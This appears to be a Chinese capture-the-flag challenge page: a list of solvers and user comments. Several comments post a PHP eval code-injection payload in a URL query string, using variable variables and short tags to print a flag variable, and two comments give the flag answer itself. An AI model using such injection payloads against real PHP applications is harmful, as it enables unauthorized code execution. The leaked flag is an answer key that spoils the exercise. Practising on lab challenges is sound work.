评分(6)
解题动态
Beac0n 攻破了该题 7小时前
72995551 攻破了该题 8小时前
xixi,mxixi 攻破了该题 12小时前
派大星CTF 攻破了该题 12小时前
Pa3da 攻破了该题 1天前
feifeifei1212 攻破了该题 1天前
Gyro 攻破了该题 5天前
besty2k 攻破了该题 5天前
3204372098 攻破了该题 7天前
常陆茉子 攻破了该题 8天前
YameMres 攻破了该题 9天前
zttyzz 攻破了该题 12天前
PY222 攻破了该题 13天前
16671766779 攻破了该题 14天前
18185185996 攻破了该题 18天前
twq1111 攻破了该题 20天前
ifnoif 攻破了该题 20天前
5013230204 攻破了该题 22天前
montarius 攻破了该题 23天前
评论
派大星CTF 11小时前
举报
eavl()会开启新的php标签,而不是闭合第一行代码的标签所以需要结束eval里开启的标签,在开启一个php代码来执行输出$flag
YUMEKO 9月前
举报
http://xxxxxxxxxx/?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111333
Daniel2023 10月前
举报
payload: /?flag=$a='fla9';$a{3}='g';?><?=$$a;?>111111111111111111
coo1an 1年前
举报
1、长度是年9, 2、利用短标签和替代,<?php echo $flag;?>使用短标签(<? echo $flag;?>,,再继续使用短标签替代echo ,<?= $flag;?> flag=$f=%274lag%27;$f{0}=%27f%27;?%3E%3C?=$$f;?%3E111111111111111111
110-没办法 1年前
举报
flag{78062956}
wxy1343 1年前
举报
flag{78062956}
w登临意 1年前
举报
好难
阿Q啊 2年前
举报
但是不精通php不会写,就很难受,只能看别人的writeup的payload
阿Q啊 2年前
举报
这题关键在于eval函数,绕过前面几个if的判断条件进入到最后一个if判断条件,由于存在eval函数,可以构造php代码执行,直接输出flag,这题有意思!!
哎嘿嘿1314 2年前
举报
牛皮